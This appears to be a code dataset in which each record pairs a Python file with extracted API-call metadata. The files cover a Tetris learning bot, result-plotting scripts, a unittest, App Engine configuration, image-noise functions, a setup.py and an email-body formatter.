def convert_to_pixel_coords(boxx, boxy):
# Convert the given xy coordinates of the board to xy
# coordinates of the location on the screen.
return (XMARGIN + (boxx * BOXSIZE)), (YMARGIN + (boxy * BOXSIZE))
def draw_box(boxx, boxy, color, pixelx=None, pixely=None):# ๋ณด๋ ์์ ๊พธ์คํ๊ฒ ์ด๋ฒคํธ๊ฐ ์ผ์ด๋๋ ๋ธ๋ก ๋ด์ฉ๋ค์ ๋ ๋๋ง
for i in range(BOARDWIDTH):
pg.draw.line(GAME, GRAY, ((XMARGIN + 10) + (i * BOXSIZE - 10), YMARGIN - 3),
((XMARGIN + 10) + (i * BOXSIZE - 10), YMARGIN + 600), 2) # ๋ณด๋ ์ฌ์ ์ค ์ธ๋ก ์ ๊ทธ๋ฆฌ๊ธฐ
for j in range(BOARDHEIGHT):
pg.draw.line(GAME, GRAY, (XMARGIN, (YMARGIN - 3) + (j * BOXSIZE)),
(XMARGIN + 300, (YMARGIN - 3) + (j * BOXSIZE)), 2) # ๋ณด๋ ์ฌ์ ์ค ๊ฐ๋ก ์ ๊ทธ๋ฆฌ๊ธฐ
if color == BLANK:
return
if pixelx is None and pixely is None:
pixelx, pixely = convert_to_pixel_coords(boxx, boxy)
pg.draw.rect(GAME, COLORS[color],
(pixelx + 1, pixely + 1, BOXSIZE - 1, BOXSIZE - 1))
pg.draw.rect(GAME, LIGHTCOLORS[color],
(pixelx + 1, pixely + 1, BOXSIZE - 4, BOXSIZE - 4))
def draw_board(board):
# ์ฝ๋ฉ ํด๋ ๋ณด๋ ๋ฐฐ์ด์ ํ๋ฉด์ ๋ ๋๋ง ํ๋ค
pg.draw.rect(GAME, BORDERCOLOR,
(XMARGIN - 3, YMARGIN - 7, (BOARDWIDTH * BOXSIZE) + 8,
(BOARDHEIGHT * BOXSIZE) + 8), 5)
# fill the background of the board
pg.draw.rect(
GAME, BGCOLOR,
(XMARGIN, YMARGIN, BOXSIZE * BOARDWIDTH, BOXSIZE * BOARDHEIGHT))
# draw the individual boxes on the board
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
draw_box(x, y, board[x][y])
def draw_status(score, level, best_move, games_completed): # ํ๋ฉด์ ์ค์ฝ์ด ๋ ๋ฒจ, ํ์ต์ํ ๊ทธ๋ฆฌ๊ณ ๋ค์ ์ต์ ํ๋ ๋ธ๋ก ๋ฐฉํฅ์ ๋ ๋๋ง
# draw the score text
score_surf = SubFont.render('Score: %s' % score, True, TEXTCOLOR)
score_rect = score_surf.get_rect()
score_rect.topleft = (WINDOWWIDTH - 200, 20)
GAME.blit(score_surf, score_rect)
# draw the level text
level_surf = SubFont.render('Level: %s' % level, True, TEXTCOLOR)
level_rect = level_surf.get_rect()
level_rect.topleft = (WINDOWWIDTH - 200, 50)
GAME.blit(level_surf, level_rect)
# draw the best_move text
move_surf = SubFont.render('Current Move: %s' % best_move, True, TEXTCOLOR)
move_rect = move_surf.get_rect()
move_rect.topleft = (WINDOWWIDTH - 230, 300)
GAME.blit(move_surf, move_rect)
# draw the best_move text
move_surf = SubFont.render('Learing level : %s' % games_completed, True, TEXTCOLOR)
move_rect = move_surf.get_rect()
move_rect.topleft = (20, 150)
GAME.blit(move_surf, move_rect)
def draw_piece(piece, pixelx=None, pixely=None):
shape_to_draw = PIECES[piece['shape']][piece['rotation']]
if pixelx is None and pixely is None:
# ํ๋ฉด์ ๋ ๋๋ง ํด์ผํ ๋ธ๋ก x,y ์ขํ๋ฅผ ํฝ์
x,y๋ก ๋ฐ๋๋ค
pixelx, pixely = convert_to_pixel_coords(piece['x'], piece['y'])
for x in range(BOXWIDTH):
for y in range(BOXHEIGHT):
if shape_to_draw[y][x] != BLANK:
draw_box(None, None, piece['color'], pixelx + (x * BOXSIZE), pixely + (y * BOXSIZE))
def draw_next_piece(piece): # ํ๋ฉด์ ๋ค์ ๋ธ๋ก ๋ชจ์ ๋ ๋๋ง
# draw the "next" text
next_surf = SubFont.render('Next:', True, TEXTCOLOR)
next_rect = next_surf.get_rect()
next_rect.topleft = (WINDOWWIDTH - 200, 80)
GAME.blit(next_surf, next_rect)
# draw the "next" piece
draw_piece(piece, pixelx=WINDOWWIDTH - 180, pixely=100)
def get_parameters(board):
# This function will calculate different parameters of the current board
# Initialize some stuff
heights = [0]*BOARDWIDTH
diffs = [0]*(BOARDWIDTH-1)
holes = 0
diff_sum = 0
# Calculate the maximum height of each column
for i in range(0, BOARDWIDTH): # Select a column
for j in range(0, BOARDHEIGHT): # Search down starting from the top of the board
if int(board[i][j]) > 0: # Is the cell occupied?
heights[i] = BOARDHEIGHT - j # Store the height value
break
# Calculate the difference in heights
for i in range(0, len(diffs)):
diffs[i] = heights[i + 1] - heights[i]
# Calculate the maximum height
max_height = max(heights)
# Count the number of holes
for i in range(0, BOARDWIDTH):
occupied = 0 # Set the 'Occupied' flag to 0 for each new column
for j in range(0, BOARDHEIGHT): # Scan from top to bottom
if int(board[i][j]) > 0:
occupied = 1 # If a block is found, set the 'Occupied' flag to 1
if int(board[i][j]) == 0 and occupied == 1:
holes += 1 # If a hole is found, add one to the count
height_sum = sum(heights)
for i in diffs:
diff_sum += abs(i)
return height_sum, diff_sum, max_height, holes
def get_expected_score(test_board, weights):
# This function calculates the score of a given board state, given weights and the number
# of lines previously cleared.
height_sum, diff_sum, max_height, holes = get_parameters(test_board)
A = weights[0]
B = weights[1]
C = weights[2]
D = weights[3]
test_score = float(A * height_sum + B * diff_sum + C * max_height + D * holes)
return test_score
def simulate_board(test_board, test_piece, move):
# This function simulates placing the current falling piece onto the
# board, specified by 'move,' an array with two elements, 'rot' and 'sideways'.
# 'rot' gives the number of times the piece is to be rotated ranging in [0:3]
# 'sideways' gives the horizontal movement from the piece's current position, in [-9:9]
# It removes complete lines and gives returns the next board state as well as the number
# of lines cleared.
rot = move[0]
sideways = move[1]
test_lines_removed = 0
reference_height = get_parameters(test_board)[0]
if test_piece is None:
return None
# Rotate test_piece to match the desired move
for i in range(0, rot):
test_piece['rotation'] = (test_piece['rotation'] + 1) % len(PIECES[test_piece['shape']])
# Test for move validity!
if not is_valid_position(test_board, test_piece, adj_x=sideways, adj_y=0):
# The move itself is not valid!
return None
# Move the test_piece to collide on the board
test_piece['x'] += sideways
for i in range(0, BOARDHEIGHT):
if is_valid_position(test_board, test_piece, adj_x=0, adj_y=1):
test_piece['y'] = i
# Place the piece on the virtual board
if is_valid_position(test_board, test_piece, adj_x=0, adj_y=0):
add_to_board(test_board, test_piece)
test_lines_removed, test_board = remove_complete_lines(test_board)
height_sum, diff_sum, max_height, holes = get_parameters(test_board)
one_step_reward = 5 * (test_lines_removed * test_lines_removed) - (height_sum - reference_height)
return test_board, one_step_reward
def find_best_move(board, piece, weights, explore_change):
move_list = []
score_list = []
for rot in range(0, len(PIECES[piece['shape']])):
for sideways in range(-5, 6):
move = [rot, sideways]
test_board = copy.deepcopy(board)
test_piece = copy.deepcopy(piece)
test_board = simulate_board(test_board, test_piece, move)
if test_board is not None:
move_list.append(move)
test_score = get_expected_score(test_board[0], weights)
score_list.append(test_score)
best_score = max(score_list)
best_move = move_list[score_list.index(best_score)]
if random.random() < explore_change:
move = move_list[random.randint(0, len(move_list) - 1)]
else:
move = best_move
return move
def make_move(move):
# This function will make the indicated move, with the first digit
# representing the number of rotations to be made and the seconds
# representing the column to place the piece in.
rot = move[0]
sideways = move[1]
if rot != 0:
pyautogui.press('up')
rot -= 1
else:
if sideways == 0:
pyautogui.press('space')
if sideways < 0:
pyautogui.press('left')
sideways += 1
if sideways > 0:
pyautogui.press('right')
sideways -= 1
return [rot, sideways]
def gradient_descent(board, piece, weights, explore_change):
move = find_best_move(board, piece, weights, explore_change)
old_params = get_parameters(board)
test_board = copy.deepcopy(board)
test_piece = copy.deepcopy(piece)
test_board = simulate_board(test_board, test_piece, move)
if test_board is not None:
new_params = get_parameters(test_board[0])
one_step_reward = test_board[1]
for i in range(0, len(weights)):
weights[i] = weights[i] + alpha * weights[i] * (
one_step_reward - old_params[i] + gamma * new_params[i])
regularization_term = abs(sum(weights))
for i in range(0, len(weights)):
weights[i] = 100 * weights[i] / regularization_term
weights[i] = math.floor(1e4 * weights[i]) / 1e4 # Rounds the weights
return move, weights
def Run(g,f,s):
global GAME, FPS, SubFont
global weights,explore_change, games_completed
GAME = g
FPS = f
SubFont = s
games_completed = 0
while True: # game loop
games_completed += 1
newScore, weights, explore_change = Run_game(weights, explore_change)
print("Game Number ", games_completed, " achieved a score of: ", newScore )
if games_completed == MAX_GAMES: # ์ด 20๋ฒ์ ๊ฒ์์ ๋ฐ๋ณตํ๋ฉด ๊ฒ์ ์ข
๋ฃ
show_text_screen('Game Finish')
time.sleep(3)
return
else:
show_text_screen('Game Over') # ์๋๊ฒฝ์ฐ ๊ณ์ํด์ ํ๋ ์ด
|
[
"copy.deepcopy",
"pygame.draw.line",
"pygame.draw.rect",
"pygame.event.get",
"pyautogui.press",
"math.floor",
"time.sleep",
"time.time",
"random.random",
"pygame.display.update",
"sys.exit"
] |
[((3036, 3047), 'time.time', 'time.time', ([], {}), '()\n', (3045, 3047), False, 'import random, time, sys\n'), ((7084, 7103), 'pygame.display.update', 'pg.display.update', ([], {}), '()\n', (7101, 7103), True, 'import pygame as pg\n'), ((7123, 7138), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (7133, 7138), False, 'import random, time, sys\n'), ((10756, 10846), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'COLORS[color]', '(pixelx + 1, pixely + 1, BOXSIZE - 1, BOXSIZE - 1)'], {}), '(GAME, COLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 1, \n BOXSIZE - 1))\n', (10768, 10846), True, 'import pygame as pg\n'), ((10867, 10961), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'LIGHTCOLORS[color]', '(pixelx + 1, pixely + 1, BOXSIZE - 4, BOXSIZE - 4)'], {}), '(GAME, LIGHTCOLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 4,\n BOXSIZE - 4))\n', (10879, 10961), True, 'import pygame as pg\n'), ((11037, 11156), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'BORDERCOLOR', '(XMARGIN - 3, YMARGIN - 7, BOARDWIDTH * BOXSIZE + 8, BOARDHEIGHT * BOXSIZE + 8)', '(5)'], {}), '(GAME, BORDERCOLOR, (XMARGIN - 3, YMARGIN - 7, BOARDWIDTH *\n BOXSIZE + 8, BOARDHEIGHT * BOXSIZE + 8), 5)\n', (11049, 11156), True, 'import pygame as pg\n'), ((11243, 11340), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'BGCOLOR', '(XMARGIN, YMARGIN, BOXSIZE * BOARDWIDTH, BOXSIZE * BOARDHEIGHT)'], {}), '(GAME, BGCOLOR, (XMARGIN, YMARGIN, BOXSIZE * BOARDWIDTH, \n BOXSIZE * BOARDHEIGHT))\n', (11255, 11340), True, 'import pygame as pg\n'), ((18416, 18436), 'copy.deepcopy', 'copy.deepcopy', (['board'], {}), '(board)\n', (18429, 18436), False, 'import copy, numpy, pyautogui, math\n'), ((18454, 18474), 'copy.deepcopy', 'copy.deepcopy', (['piece'], {}), '(piece)\n', (18467, 18474), False, 'import copy, numpy, pyautogui, math\n'), ((3901, 3915), 'pygame.event.get', 'pg.event.get', ([], {}), '()\n', (3913, 3915), True, 'import pygame as pg\n'), ((6197, 6216), 'pygame.display.update', 'pg.display.update', ([], {}), '()\n', (6214, 6216), True, 'import pygame as pg\n'), ((10235, 10368), 'pygame.draw.line', 'pg.draw.line', (['GAME', 'GRAY', '(XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN - 3)', '(XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN + 600)', '(2)'], {}), '(GAME, GRAY, (XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN - 3),\n (XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN + 600), 2)\n', (10247, 10368), True, 'import pygame as pg\n'), ((10451, 10565), 'pygame.draw.line', 'pg.draw.line', (['GAME', 'GRAY', '(XMARGIN, YMARGIN - 3 + j * BOXSIZE)', '(XMARGIN + 300, YMARGIN - 3 + j * BOXSIZE)', '(2)'], {}), '(GAME, GRAY, (XMARGIN, YMARGIN - 3 + j * BOXSIZE), (XMARGIN + \n 300, YMARGIN - 3 + j * BOXSIZE), 2)\n', (10463, 10565), True, 'import pygame as pg\n'), ((17485, 17500), 'random.random', 'random.random', ([], {}), '()\n', (17498, 17500), False, 'import random, time, sys\n'), ((17917, 17938), 'pyautogui.press', 'pyautogui.press', (['"""up"""'], {}), "('up')\n", (17932, 17938), False, 'import copy, numpy, pyautogui, math\n'), ((3262, 3273), 'time.time', 'time.time', ([], {}), '()\n', (3271, 3273), False, 'import random, time, sys\n'), ((17055, 17075), 'copy.deepcopy', 'copy.deepcopy', (['board'], {}), '(board)\n', (17068, 17075), False, 'import copy, numpy, pyautogui, math\n'), ((17101, 17121), 'copy.deepcopy', 'copy.deepcopy', (['piece'], {}), '(piece)\n', (17114, 17121), False, 'import copy, numpy, pyautogui, math\n'), ((18004, 18028), 'pyautogui.press', 'pyautogui.press', (['"""space"""'], {}), "('space')\n", (18019, 18028), False, 'import copy, numpy, pyautogui, math\n'), ((18066, 18089), 'pyautogui.press', 'pyautogui.press', (['"""left"""'], {}), "('left')\n", (18081, 18089), False, 'import copy, numpy, pyautogui, math\n'), ((18153, 18177), 'pyautogui.press', 'pyautogui.press', (['"""right"""'], {}), "('right')\n", (18168, 18177), False, 'import copy, numpy, pyautogui, math\n'), ((18984, 19016), 'math.floor', 'math.floor', (['(10000.0 * weights[i])'], {}), '(10000.0 * weights[i])\n', (18994, 19016), False, 'import copy, numpy, pyautogui, math\n'), ((19572, 19585), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (19582, 19585), False, 'import random, time, sys\n'), ((4024, 4034), 'sys.exit', 'sys.exit', ([], {}), '()\n', (4032, 4034), False, 'import random, time, sys\n'), ((5352, 5363), 'time.time', 'time.time', ([], {}), '()\n', (5361, 5363), False, 'import random, time, sys\n'), ((5947, 5958), 'time.time', 'time.time', ([], {}), '()\n', (5956, 5958), False, 'import random, time, sys\n')]
|
"""
main entry of post process results data and plot
"""
import PlotHeatMap
import PostProcessDataFuns as psf
import PlotOperatorConverge
import para
import PlotGantt
# root_folder = r"C:\Users\phdji\OneDrive - Danmarks Tekniske Universitet\JuanJuanLin\Tests2022/"
# root_folder = r'C:/GitCodes/Res/'
# root_folder = r'C:/GitCodes/LearnByCompare/'
# root_folder = r'C:/GitCodes/RandomDemand/'
# root_folder = r'M:/LinJuan/500Iter/'
# plot 1 plot the heatmap for the optimal pattern
plot_opt_case_folder = r"M:/LinJuan/0.001ConvergeNoLearning/Operator/1_TestOp_8/"
def EffectOfOperators():
# convergence the algorithm
## each operator
OperatorFolder = root_folder + "/Operator/"
psf.effect_of_operators(OperatorFolder)
def CompareThree():
"""
compare three cases
1: Single operator 2. Uni. 2 adaptive
"""
OperatorFolder = root_folder + "/CompareThree/"
psf.CompareOneFolder(OperatorFolder,"CompareThree")
def PlotFinalRelation(test_folder:str):
"""visulise the dominate relationship
"""
# test_folder = "M:/LinJuan/0_ALNS/"
# test_folder = "C:/GitCodes/0_ALNS/"
bs = psf.getBestSeed(test_folder)
print("Best Seed = {0}".format(bs))
psf.plotRelation(test_folder)
if __name__ == "__main__":
# EffectOfOperators()
# CompareThree()
# test_folder = r'C:/GitCodes/1_TestOp_8/'
# PlotFinalRelation(test_folder)
# testfolder = root_folder + "/RemoveOperator/"
# psf.CompareOneFolder(testfolder,"RemoveOp")
# remark: I may need to adjust the heatmap to the dominate score map??
# op_folder = r"M:\LinJuan\0.001ConvergeNoLearning\Operator\1_TestOp_8"
# PlotHeatMap.plot_Patten_heat_map(para.FailureLinks,num_of_seed=para.NumOfTestSeed,_folder=op_folder)
# PlotOperatorConverge.change_operator_prob_over_iterations(op_folder,_num_operators=9)
# plot gantt chart
best_seed = psf.getBestSeed(plot_opt_case_folder)
# psf.print_best_seed_sol(plot_opt_case_folder,best_seed)
# psf.print_best_seed_period(plot_opt_case_folder,best_seed)
psf.plot_best_seed_period(plot_opt_case_folder)
PlotGantt.plot_general_Gant_chart("Gantt_SiouxFall",plot_opt_case_folder,best_seed)
pass
exit()
## unified prob
### Just copy the plot from unfolder
## adaptive probability
### Just copy the plot from ALNS folder
## change of the prob rate over all iterations
OperatorCovergeFolder = root_folder +"/9_ALNS/"
PlotOperatorConverge.change_operator_prob_over_iterations(root_folder)
# remark: need to set the nodes read
PlotHeatMap.plot_Patten_heat_map(set_fail_links=[])
# project schedule
## TODO: plot the gant chart for the general case
# compare with the gentic algorithm
|
[
"PlotHeatMap.plot_Patten_heat_map",
"PostProcessDataFuns.CompareOneFolder",
"PostProcessDataFuns.plotRelation",
"PostProcessDataFuns.getBestSeed",
"PlotOperatorConverge.change_operator_prob_over_iterations",
"PlotGantt.plot_general_Gant_chart",
"PostProcessDataFuns.effect_of_operators",
"PostProcessDataFuns.plot_best_seed_period"
] |
[((2453, 2523), 'PlotOperatorConverge.change_operator_prob_over_iterations', 'PlotOperatorConverge.change_operator_prob_over_iterations', (['root_folder'], {}), '(root_folder)\n', (2510, 2523), False, 'import PlotOperatorConverge\n'), ((2561, 2612), 'PlotHeatMap.plot_Patten_heat_map', 'PlotHeatMap.plot_Patten_heat_map', ([], {'set_fail_links': '[]'}), '(set_fail_links=[])\n', (2593, 2612), False, 'import PlotHeatMap\n'), ((705, 744), 'PostProcessDataFuns.effect_of_operators', 'psf.effect_of_operators', (['OperatorFolder'], {}), '(OperatorFolder)\n', (728, 744), True, 'import PostProcessDataFuns as psf\n'), ((915, 967), 'PostProcessDataFuns.CompareOneFolder', 'psf.CompareOneFolder', (['OperatorFolder', '"""CompareThree"""'], {}), "(OperatorFolder, 'CompareThree')\n", (935, 967), True, 'import PostProcessDataFuns as psf\n'), ((1151, 1179), 'PostProcessDataFuns.getBestSeed', 'psf.getBestSeed', (['test_folder'], {}), '(test_folder)\n', (1166, 1179), True, 'import PostProcessDataFuns as psf\n'), ((1224, 1253), 'PostProcessDataFuns.plotRelation', 'psf.plotRelation', (['test_folder'], {}), '(test_folder)\n', (1240, 1253), True, 'import PostProcessDataFuns as psf\n'), ((1914, 1951), 'PostProcessDataFuns.getBestSeed', 'psf.getBestSeed', (['plot_opt_case_folder'], {}), '(plot_opt_case_folder)\n', (1929, 1951), True, 'import PostProcessDataFuns as psf\n'), ((2083, 2130), 'PostProcessDataFuns.plot_best_seed_period', 'psf.plot_best_seed_period', (['plot_opt_case_folder'], {}), '(plot_opt_case_folder)\n', (2108, 2130), True, 'import PostProcessDataFuns as psf\n'), ((2135, 2224), 'PlotGantt.plot_general_Gant_chart', 'PlotGantt.plot_general_Gant_chart', (['"""Gantt_SiouxFall"""', 'plot_opt_case_folder', 'best_seed'], {}), "('Gantt_SiouxFall', plot_opt_case_folder,\n best_seed)\n", (2168, 2224), False, 'import PlotGantt\n')]
|
"""
TDD - Test Driven Development
"""
import unittest
from src.base.bacon_with_eggs import bacon_with_eggs
class TestBaconWithEggs(unittest.TestCase):
def test_bacon_with_eggs_assertion_error_do_not_receive_int(self):
with self.assertRaises(AssertionError):
bacon_with_eggs('')
def test_bacon_with_eggs_return_bacon_with_eggs_if_the_input_is_a_multiple_of_3_and_5(self):
inputs = (15, 30, 90, 120)
output = "Bacon with Eggs"
for input in inputs:
with self.subTest(input=input, output=output):
self.assertEqual(
bacon_with_eggs(input),
output,
msg=f"'{input}' id not return the '{output}'"
)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
[
"unittest.main",
"src.base.bacon_with_eggs.bacon_with_eggs"
] |
[((786, 812), 'unittest.main', 'unittest.main', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (799, 812), False, 'import unittest\n'), ((286, 305), 'src.base.bacon_with_eggs.bacon_with_eggs', 'bacon_with_eggs', (['""""""'], {}), "('')\n", (301, 305), False, 'from src.base.bacon_with_eggs import bacon_with_eggs\n'), ((617, 639), 'src.base.bacon_with_eggs.bacon_with_eggs', 'bacon_with_eggs', (['input'], {}), '(input)\n', (632, 639), False, 'from src.base.bacon_with_eggs import bacon_with_eggs\n')]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""
`appengine_config.py` is automatically loaded when Google App Engine
starts a new instance of your application. This runs before any
WSGI applications specified in app.yaml are loaded.
"""
from google.appengine.ext import vendor
# Third-party libraries are stored in "lib", vendoring will make
# sure that they are importable by the application.
vendor.add('lib')
# disable warnings when using requests library with sockets on app engine
import requests
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
from requests.packages.urllib3.exceptions import SNIMissingWarning
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)
|
[
"google.appengine.ext.vendor.add",
"requests.packages.urllib3.disable_warnings"
] |
[((416, 433), 'google.appengine.ext.vendor.add', 'vendor.add', (['"""lib"""'], {}), "('lib')\n", (426, 433), False, 'from google.appengine.ext import vendor\n'), ((666, 733), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', (['InsecurePlatformWarning'], {}), '(InsecurePlatformWarning)\n', (708, 733), False, 'import requests\n'), ((734, 795), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', (['SNIMissingWarning'], {}), '(SNIMissingWarning)\n', (776, 795), False, 'import requests\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 6 23:59:38 2021
@author: <NAME>
"""
# Adding Salt and Pepper Noise to image
import cv2 as cv
import numpy as np
import random
# Adding salt and pepper noise
def gaussian_noise(image):
row = 512
col = 512
mean = 0
var = 0.1
sigma = var**0.5
gauss = np.random.normal(mean,sigma,(row,col))
gauss = gauss.reshape(row,col)
gauss_noisy = image + gauss
return gauss_noisy
def salt_and_pepper_noise(image):
# Getting the dimensions of the image
row , col = img.shape
# Randomly pick some pixels in the
# image for coloring them white
# Pick a random number between 300 and 10000
number_of_pixels = random.randint(300, 10000)
for i in range(number_of_pixels):
# Pick a random y coordinate
y_coord=random.randint(0, row - 1)
# Pick a random x coordinate
x_coord=random.randint(0, col - 1)
# Color that pixel to white
img[y_coord][x_coord] = 255
# Randomly pick some pixels in
# the image for coloring them black
# Pick a random number between 300 and 10000
number_of_pixels = random.randint(300 , 10000)
for i in range(number_of_pixels):
# Pick a random y coordinate
y_coord=random.randint(0, row - 1)
# Pick a random x coordinate
x_coord=random.randint(0, col - 1)
# Color that pixel to black
img[y_coord][x_coord] = 0
return img
img = cv.imread('Lenna.jpg', 0)
gn = gaussian_noise(img)
snp = salt_and_pepper_noise(img)
|
[
"cv2.imread",
"random.randint",
"numpy.random.normal"
] |
[((1586, 1611), 'cv2.imread', 'cv.imread', (['"""Lenna.jpg"""', '(0)'], {}), "('Lenna.jpg', 0)\n", (1595, 1611), True, 'import cv2 as cv\n'), ((338, 379), 'numpy.random.normal', 'np.random.normal', (['mean', 'sigma', '(row, col)'], {}), '(mean, sigma, (row, col))\n', (354, 379), True, 'import numpy as np\n'), ((733, 759), 'random.randint', 'random.randint', (['(300)', '(10000)'], {}), '(300, 10000)\n', (747, 759), False, 'import random\n'), ((1219, 1245), 'random.randint', 'random.randint', (['(300)', '(10000)'], {}), '(300, 10000)\n', (1233, 1245), False, 'import random\n'), ((860, 886), 'random.randint', 'random.randint', (['(0)', '(row - 1)'], {}), '(0, row - 1)\n', (874, 886), False, 'import random\n'), ((951, 977), 'random.randint', 'random.randint', (['(0)', '(col - 1)'], {}), '(0, col - 1)\n', (965, 977), False, 'import random\n'), ((1347, 1373), 'random.randint', 'random.randint', (['(0)', '(row - 1)'], {}), '(0, row - 1)\n', (1361, 1373), False, 'import random\n'), ((1438, 1464), 'random.randint', 'random.randint', (['(0)', '(col - 1)'], {}), '(0, col - 1)\n', (1452, 1464), False, 'import random\n')]
|
from setuptools import setup, find_packages
setup(
name="betterplotlib",
version="1.5.0",
description="Some wrappers for matplotlib to make plotting easier and nicer.",
long_description="This module contains wrapper functions for matplotlib. A lot of the matplotlib plots are ugly and not easy to make, so I wrote some functions that do a lot of the stuff that should be easy, as well as wrappers for common plots that make them look nicer. ",
url="http://betterplotlib.readthedocs.io/en/master/",
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
keywords="plotting matplotlib",
packages=find_packages(exclude=["docs"]),
install_requires=["matplotlib", "numpy", "palettable"]
)
|
[
"setuptools.find_packages"
] |
[((613, 644), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['docs']"}), "(exclude=['docs'])\n", (626, 644), False, 'from setuptools import setup, find_packages\n')]
|
# -*- coding: utf-8 -*-
############################################################################
#
# Copyright ยฉ 2012, 2013, 2014, 2015 OnlineGroups.net and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
############################################################################
from __future__ import absolute_import, unicode_literals, print_function
from operator import attrgetter
from gs.cache import cache
from gs.group.privacy import get_visibility, PERM_ANN
from gs.group.messages.text import (
split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher,
wrap_message)
from Products.GSGroup.interfaces import IGSMailingListInfo
from .matcher import (youTubeMatcher, vimeoMatcher, PublicEmailMatcher, )
# this is currently the hard limit on the number of word's we will process.
# after this we insert a message. TODO: make this more flexible by using
# AJAX to incrementally fetch large emails
EMAIL_WORD_LIMIT = 5000
class OnlineHTMLBody(HTMLBody):
'''The HTML form of a plain-text email body.
:param str originalText: The original (plain) text
:param object contentProvider: The content provider that is rendering this mess'''
def __init__(self, originalText, perm, okAddresses):
super(OnlineHTMLBody, self).__init__(originalText)
self.matchers = [youTubeMatcher, vimeoMatcher, boldMatcher, wwwMatcher, uriMatcher]
if perm == PERM_ANN: # The messages are visible to Anon
p = PublicEmailMatcher(okAddresses)
self.matchers.append(p)
else:
self.matchers.append(emailMatcher)
sorted(self.matchers, key=attrgetter('weight'))
@cache('gs.group.messages.post.postintroremainder',
lambda contentProvider, text: ':'.join(
(str(contentProvider.post['post_id']),
str((get_visibility(contentProvider.groupInfo.groupObj))))
), 3600)
def get_post_intro_and_remainder(contentProvider, text):
"""Get the introduction and remainder text of the formatted post
:param object contentProvider: The content provider renderning the message, providing access to
the context, groupInfo and other useful tidbits.
:parm str text: The text to split into an introduction and remainder
:returns: A 2-tuple of the strings that represent the email intro and the remainder."""
if not contentProvider.groupInfo.groupObj:
raise ValueError("The groupInfo object should always have a groupObj")
if not text:
# Sorry, Dijkstra
return SplitMessage('', '')
mailBody = wrap_message(text)
plain = split_message(mailBody)
messages = contentProvider.groupInfo.groupObj.messages
perm = get_visibility(messages)
ml = IGSMailingListInfo(contentProvider.groupInfo.groupObj)
okAddresses = (contentProvider.siteInfo.get_support_email(),
ml.get_property('mailto'))
markedUpIntro = ''
if plain.intro:
markedUpIntro = unicode(OnlineHTMLBody(plain.intro, perm, okAddresses))
markedUpRemainder = ''
if plain.remainder:
markedUpRemainder = unicode(OnlineHTMLBody(plain.remainder, perm, okAddresses))
retval = SplitMessage(markedUpIntro, markedUpRemainder)
return retval
|
[
"Products.GSGroup.interfaces.IGSMailingListInfo",
"operator.attrgetter",
"gs.group.messages.text.split_message",
"gs.group.privacy.get_visibility",
"gs.group.messages.text.SplitMessage",
"gs.group.messages.text.wrap_message"
] |
[((2972, 2990), 'gs.group.messages.text.wrap_message', 'wrap_message', (['text'], {}), '(text)\n', (2984, 2990), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((3003, 3026), 'gs.group.messages.text.split_message', 'split_message', (['mailBody'], {}), '(mailBody)\n', (3016, 3026), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((3098, 3122), 'gs.group.privacy.get_visibility', 'get_visibility', (['messages'], {}), '(messages)\n', (3112, 3122), False, 'from gs.group.privacy import get_visibility, PERM_ANN\n'), ((3133, 3187), 'Products.GSGroup.interfaces.IGSMailingListInfo', 'IGSMailingListInfo', (['contentProvider.groupInfo.groupObj'], {}), '(contentProvider.groupInfo.groupObj)\n', (3151, 3187), False, 'from Products.GSGroup.interfaces import IGSMailingListInfo\n'), ((3577, 3623), 'gs.group.messages.text.SplitMessage', 'SplitMessage', (['markedUpIntro', 'markedUpRemainder'], {}), '(markedUpIntro, markedUpRemainder)\n', (3589, 3623), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((2936, 2956), 'gs.group.messages.text.SplitMessage', 'SplitMessage', (['""""""', '""""""'], {}), "('', '')\n", (2948, 2956), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((2030, 2050), 'operator.attrgetter', 'attrgetter', (['"""weight"""'], {}), "('weight')\n", (2040, 2050), False, 'from operator import attrgetter\n'), ((2220, 2270), 'gs.group.privacy.get_visibility', 'get_visibility', (['contentProvider.groupInfo.groupObj'], {}), '(contentProvider.groupInfo.groupObj)\n', (2234, 2270), False, 'from gs.group.privacy import get_visibility, PERM_ANN\n')]
|
